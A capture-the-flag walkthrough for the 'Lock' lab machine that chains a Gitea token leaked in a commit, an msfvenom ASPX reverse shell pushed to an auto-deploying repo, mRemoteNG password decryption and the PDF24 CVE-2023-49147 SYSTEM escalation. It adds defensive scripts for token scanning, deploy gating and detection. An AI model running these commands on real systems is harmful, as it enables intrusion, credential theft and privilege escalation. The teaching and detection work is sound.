VL-Lock

Nmap

Not shown: 995 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-IIS/10.0
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: Lock - Index
445/tcp open microsoft-ds? syn-ack ttl 127
3000/tcp open ppp
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: LOCK
| NetBIOS_Domain_Name: LOCK
| NetBIOS_Computer_Name: LOCK
| DNS_Domain_Name: Lock
| DNS_Computer_Name: Lock
| Product_Version: 10.0.20348
|_ System_Time: 2025-03-08T14:18:31+00:00
5357/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0

Foothold

Gitea

http://10.10.69.227:3000/

Gitea website

Possible Username: ellen.freeman

Looking through the commits of the dev-scripts repo we find a Gitea personal access token:

http://10.10.69.227:3000/ellen.freeman/dev-scripts/commit/8b78e6c3024416bce55926faa3f65421a25d6370

Gitea Token
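A secret committed like the one above stays in the repository history even after a later commit deletes it from the file, so the only real fix is to rotate the token. As an added example (not part of the original writeup), the following script scans `git log -p` output for 40-hex strings on added lines that sit next to a credential keyword. The patch text, commit SHA and token value are constructed placeholders, and the hint words and the 40-hex pattern are assumptions based on the token seen in this commit rather than any project's documented secret format.

```python
import re
import subprocess

# Personal access tokens in Gitea look like 40 hex characters (assumption based
# on the token seen in the commit above). Commit SHAs look the same, so a
# credential keyword on the same line is required to cut false positives.
HEX40 = re.compile(r'\b[0-9a-f]{40}\b')
HINTS = ('token', 'auth', 'password', 'passwd', 'secret', 'apikey', 'api_key')

# Constructed `git log -p` output; the commit SHA and token are placeholders.
SAMPLE_LOG = """\
commit 1111111111111111111111111111111111111111
Author: dev <dev@example.test>

    switch to hard-coded token

diff --git a/script.py b/script.py
--- a/script.py
+++ b/script.py
@@ -1,3 +1,4 @@
 import requests
-token = os.environ['GITEA_ACCESS_TOKEN']
+personal_access_token = 'deadbeefdeadbeefdeadbeefdeadbeefdeadbeef'
+pinned_sha = 'cafebabecafebabecafebabecafebabecafebabe'
"""


def find_leaked_tokens(patch_text):
    """Return (commit, token) pairs for added lines that carry a 40-hex value
    next to a credential keyword. Removed lines are skipped on purpose: the
    value is reported at the commit that introduced it."""
    hits = []
    commit = None
    for line in patch_text.splitlines():
        if line.startswith('commit '):
            commit = line.split()[1]
            continue
        # Only added lines matter; '+++ b/file' is a diff header, not content.
        if not line.startswith('+') or line.startswith('+++'):
            continue
        body = line[1:]
        if not any(hint in body.lower() for hint in HINTS):
            continue
        for match in HEX40.finditer(body):
            hits.append((commit, match.group(0)))
    return hits


def scan_repo(path):
    """Run the scanner over the full history of every branch in a local clone."""
    log = subprocess.run(['git', '-C', path, 'log', '-p', '--all'],
                         capture_output=True, text=True, check=True).stdout
    return find_leaked_tokens(log)


if __name__ == '__main__':
    for commit, token in find_leaked_tokens(SAMPLE_LOG):
        print(f'{commit[:12]} introduces token {token[:8]}...')
```

Running `scan_repo` against a clone reports the commit that introduced each candidate; a hit means the token has to be revoked, not just removed from the tip of the branch.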

Modifying the script from the repo so it uses the token directly:

import requests
import sys

def format_domain(domain):
    # Default to https:// when only a bare host name is given
    if not domain.startswith(('http://', 'https://')):
        domain = 'https://' + domain
    return domain

def get_repositories(token, domain):
    # Gitea API: list the repositories owned by the token's user
    headers = {
        'Authorization': f'token {token}'
    }
    url = f'{domain}/api/v1/user/repos'
    response = requests.get(url, headers=headers)

    if response.status_code == 200:
        return response.json()
    else:
        raise Exception(f'Failed to retrieve repositories: {response.status_code}')

def main():
    if len(sys.argv) < 2:
        print("Usage: python script.py <gitea_domain>")
        sys.exit(1)

    gitea_domain = format_domain(sys.argv[1])

    personal_access_token = 'TOKEN'  # Use the token found in the commit directly
    if not personal_access_token:
        print("Error: no personal access token set.")
        sys.exit(1)

    try:
        repos = get_repositories(personal_access_token, gitea_domain)
        print("Repositories:")
        for repo in repos:
            print(f"- {repo['full_name']}")
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    main()

Running it returns the two repositories she has created:

Repositories:
- ellen.freeman/dev-scripts
- ellen.freeman/website

We clone the website repo with the command below:

git clone http://ellen.freeman:43ce39bb0bd6bc489284f2905f033ca467a6362f@lock.vl:3000/ellen.freeman/website.git

Helpful Readme
The readme.md says that any change pushed to the repo is deployed to the live website, so we can create an .aspx shell and add it to the repo.

Generating a shell with msfvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.5.195 LPORT=4444 -f aspx -o shell.aspx

Before we push our changes to the repo we need to set up git:

git config --global user.name ellen.freeman
git config --global user.email ellen.freeman@lock.vl

Inside the repo we add the new file, commit it and push it:

git add shell.aspx
git commit -m "shell"
git push

Then we start our listener and curl the website to trigger the shell:

rlwrap nc -nlvp 4444

curl http://lock.vl/shell.aspx

Sometimes it takes a couple of minutes until the pipeline builds the changes we made to the repository; do not push multiple times, as each push restarts the process.
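The deploy pipeline described above copies whatever is pushed straight into the IIS webroot, which is what turns write access to the repo into code execution on the server. As an added example (not from the writeup, the box or any real pipeline), here is a pre-deploy gate that rejects server-executable extensions, files carrying ASP.NET directives, and paths that escape the webroot. The extension list, the directive markers and the sample change set are constructed assumptions.

```python
import posixpath

# Extensions IIS/ASP.NET treats as server code or server configuration; a
# deploy job must never copy these from an untrusted repo. Constructed list.
SERVER_EXECUTABLE = {'.aspx', '.asp', '.ashx', '.asmx', '.asax', '.ascx',
                     '.cshtml', '.vbhtml', '.config', '.dll', '.exe', '.ps1'}
# Directives found at the top of ASP.NET pages and handlers, to catch server
# code hidden behind a harmless-looking extension. Constructed list.
ASPNET_MARKERS = (b'<%@ page', b'<%@ webhandler', b'<%@ control',
                  b'<script runat="server"')


def classify_change(path, content):
    """Decide whether one pushed file may be synced into the webroot."""
    parts = path.replace('\\', '/').split('/')
    if path.startswith(('/', '\\')) or '..' in parts:
        return 'reject: path escapes the webroot'
    ext = posixpath.splitext(path.lower())[1]
    if ext in SERVER_EXECUTABLE:
        return f'reject: server-executable extension {ext}'
    if any(marker in content.lower() for marker in ASPNET_MARKERS):
        return 'reject: ASP.NET directive in content'
    return 'allow'


def gate_deploy(changes):
    """changes maps repo path -> file bytes. Returns (allowed, rejected)."""
    allowed, rejected = [], {}
    for path, content in sorted(changes.items()):
        verdict = classify_change(path, content)
        if verdict == 'allow':
            allowed.append(path)
        else:
            rejected[path] = verdict
    return allowed, rejected


# Constructed change set modelled on the push in the writeup.
SAMPLE_CHANGES = {
    'index.html': b'<html><title>Lock - Index</title></html>',
    'css/site.css': b'body { margin: 0 }',
    'shell.aspx': b'<%@ Page Language="C#" AutoEventWireup="true" %>',
    'notes.txt': b'<%@ Page Language="C#" %> disguised handler',
    '../web.config': b'<configuration/>',
}

if __name__ == '__main__':
    allowed, rejected = gate_deploy(SAMPLE_CHANGES)
    print('deploy:', allowed)
    for path, reason in rejected.items():
        print('blocked:', path, '->', reason)
```

The gate is a stop-gap; the structural fix is to deploy only a static build artifact into a webroot where script execution is disabled, so a pushed file can never be interpreted by the server.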
Shell as Ellen

Priv Escalation

Ellen.Freeman to Gale.Dekarios

Inside c:\Users\ellen.freeman\Documents there is a config.xml.
Looking at the XML, it is a configuration file for mRemoteNG (Multi-Remote Next Generation Connection Manager, https://mremoteng.org/). A quick search turns up a GitHub repo that decrypts the passwords stored in config.xml:
https://github.com/gquere/mRemoteNG_password_decrypt

git clone https://github.com/gquere/mRemoteNG_password_decrypt
cd mRemoteNG_password_decrypt
python3 mremoteng_decrypt.py ../config.xml

RDP Password
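The reason the decrypt tool works is that mRemoteNG protects stored passwords with a default master password unless the user sets their own, so a readable connections file is a readable credential store. As an added example (not from the writeup or from the linked tool), the script below audits an mRemoteNG connections file and lists every connection that caches a password, so an administrator can find such files before an attacker does. The sample XML is constructed, and the element and attribute names (Node, Type, Password, FullFileEncryption) are assumed to follow mRemoteNG's confCons.xml layout.

```python
import xml.etree.ElementTree as ET

# Constructed connections file; attribute names follow the mRemoteNG
# confCons.xml layout (assumption), the encrypted blob values are placeholders.
SAMPLE_CONFIG = """<?xml version="1.0" encoding="utf-8"?>
<Connections Name="Connections" Export="false" EncryptionEngine="AES"
             BlockCipherMode="GCM" KdfIterations="1000"
             FullFileEncryption="false" Protected="PLACEHOLDER_BLOB" ConfVersion="2.6">
  <Node Name="Lock RDP" Type="Connection" Protocol="RDP" Hostname="10.10.78.85"
        Domain="LOCK" Username="Gale.Dekarios" Password="PLACEHOLDER_ENCRYPTED_1" />
  <Node Name="Jump SSH" Type="Connection" Protocol="SSH2" Hostname="jump.example.test"
        Username="ops" Password="" />
  <Node Name="Datacenter" Type="Container">
    <Node Name="DB01" Type="Connection" Protocol="RDP" Hostname="db01.example.test"
          Username="dba" Password="PLACEHOLDER_ENCRYPTED_2" />
  </Node>
</Connections>
"""


def local_name(tag):
    # Newer mRemoteNG files place the elements in the http://mremoteng.org
    # namespace; ElementTree renders that as '{uri}Node'.
    return tag.split('}', 1)[-1]


def audit_mremoteng(xml_text):
    """Return (findings, stored) where stored lists connections with a cached
    password and findings are human-readable risk statements."""
    root = ET.fromstring(xml_text)
    findings = []
    if root.get('FullFileEncryption', 'false').lower() != 'true':
        findings.append('connection file is not fully encrypted: '
                        'hostnames and usernames are readable in clear')
    stored = []
    for node in root.iter():
        if local_name(node.tag) != 'Node' or node.get('Type') != 'Connection':
            continue
        if node.get('Password'):
            stored.append({
                'name': node.get('Name'),
                'protocol': node.get('Protocol'),
                'hostname': node.get('Hostname'),
                'username': node.get('Username'),
            })
    if stored:
        findings.append(f'{len(stored)} connection(s) cache a password; unless a '
                        'user-set master password protects the file, the default '
                        'master password decrypts them')
    return findings, stored


if __name__ == '__main__':
    findings, stored = audit_mremoteng(SAMPLE_CONFIG)
    for line in findings:
        print('finding:', line)
    for entry in stored:
        print(f"  {entry['name']}: {entry['protocol']} {entry['username']}@{entry['hostname']}")
```

Running this over every user profile on a jump host gives the list of accounts whose passwords are effectively stored on disk; those are the ones to rotate and to move to a vault or to a user-set master password.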

Using xfreerdp we will establish an rdp session with the machine

xfreerdp /v:10.10.78.85 /u:Gale.Dekarios /p:

PDF24 - CVE-2023-49147

After getting into the RDP session we can grab the user flag. We also notice a program called PDF24 installed, and a quick search shows there is a local privilege escalation exploit for it (CVE-2023-49147): https://sec-consult.com/vulnerability-lab/advisory/local-privilege-escalation-via-msi-installer-in-pdf24-creator-geek-software-gmbh/

First we need to locate the MSI installer; after some digging around (don't forget to look for hidden folders) we find it:
MSI file

Now we need to get SetOpLock.exe onto the machine; as we have RDP we can simply copy and paste it.

We open two terminals. In the first one we place an oplock on the log file:

SetOpLock.exe "C:\Program Files\PDF24\faxPrnInst.log" r

And in the second one we run a repair of the PDF24 installer with msiexec:

msiexec.exe /fa C:\\_install\\pdf24-creator-11.15.1-x64.msi

RDP exploits

Once the repair has loaded you can follow the instructions from the GitHub repo to get a shell:

  • right click on the top bar of the cmd window
  • click on properties
  • under options click on the “Legacyconsolemode” link
  • open the link with a browser other than internet explorer or edge (both don’t open as SYSTEM when on Win11)
  • in the opened browser window press the key combination CTRL+o
  • type cmd.exe in the top bar and press Enter
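The chain above leaves a distinctive process trail on the host: an MSI repair started from an interactive user session, a browser that runs as SYSTEM, and a shell whose parent process is that browser. As an added example (not from the writeup or the advisory), the detection logic below runs over constructed Sysmon-style process creation records and scores each of those three stages. The field names (Image, ParentImage, CommandLine, User), the browser and shell image lists, and the parent image of the SYSTEM browser are assumptions.

```python
import ntpath
import re

# Image names to treat as browsers and shells; constructed lists.
BROWSERS = {'firefox.exe', 'chrome.exe', 'msedge.exe', 'iexplore.exe'}
SHELLS = {'cmd.exe', 'powershell.exe', 'pwsh.exe'}
SYSTEM_USER = r'NT AUTHORITY\SYSTEM'
# msiexec repair switch: /f followed by optional option letters (e.g. /fa).
REPAIR_FLAG = re.compile(r'(?i)(^|\s)/f[a-z]*(\s|$)')


def image_name(path):
    return ntpath.basename(path).lower()


def is_system(user):
    return user.upper() == SYSTEM_USER


def evaluate(events):
    """Return (event index, severity, reason) for every suspicious record."""
    alerts = []
    for i, ev in enumerate(events):
        image = image_name(ev.get('Image', ''))
        parent = image_name(ev.get('ParentImage', ''))
        user = ev.get('User', '')
        cmd = ev.get('CommandLine', '')
        # Stage 1: a non-privileged user kicks off an MSI repair, which the
        # Windows Installer service then performs as SYSTEM.
        if image == 'msiexec.exe' and REPAIR_FLAG.search(cmd) and not is_system(user):
            alerts.append((i, 'medium', 'MSI repair started from a user session'))
        # Stage 2: a browser has no business running as SYSTEM.
        if image in BROWSERS and is_system(user):
            alerts.append((i, 'high', 'browser running as SYSTEM'))
        # Stage 3: a shell whose parent is that SYSTEM browser is the payoff.
        if image in SHELLS and parent in BROWSERS and is_system(user):
            alerts.append((i, 'critical', 'shell spawned by a SYSTEM browser'))
    return alerts


# Constructed Sysmon-style (Event ID 1) records trimmed to the fields used;
# the parent of the SYSTEM browser is a guess, not an observed value.
SAMPLE_EVENTS = [
    {'Image': r'C:\Windows\System32\msiexec.exe',
     'CommandLine': r'msiexec.exe /fa C:\_install\pdf24-creator-11.15.1-x64.msi',
     'ParentImage': r'C:\Windows\System32\cmd.exe', 'User': r'LOCK\Gale.Dekarios'},
    {'Image': r'C:\Program Files\Mozilla Firefox\firefox.exe', 'CommandLine': 'firefox.exe',
     'ParentImage': r'C:\Windows\System32\conhost.exe', 'User': SYSTEM_USER},
    {'Image': r'C:\Windows\System32\cmd.exe', 'CommandLine': 'cmd.exe',
     'ParentImage': r'C:\Program Files\Mozilla Firefox\firefox.exe', 'User': SYSTEM_USER},
    {'Image': r'C:\Program Files\Mozilla Firefox\firefox.exe', 'CommandLine': 'firefox.exe',
     'ParentImage': r'C:\Windows\explorer.exe', 'User': r'LOCK\Gale.Dekarios'},
    {'Image': r'C:\Windows\System32\svchost.exe', 'CommandLine': 'svchost.exe -k netsvcs',
     'ParentImage': r'C:\Windows\System32\services.exe', 'User': SYSTEM_USER},
]

if __name__ == '__main__':
    for index, severity, reason in evaluate(SAMPLE_EVENTS):
        print(f'event {index}: [{severity}] {reason}')
```

On its own the medium alert is noisy, since users legitimately repair installs; correlating it with a SYSTEM browser or a SYSTEM shell on the same host within a few minutes is what makes the sequence worth an immediate look.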

https://api.vulnlab.com/api/v1/share?id=b0684778-d069-4d4a-ae3d-ce7e10d93464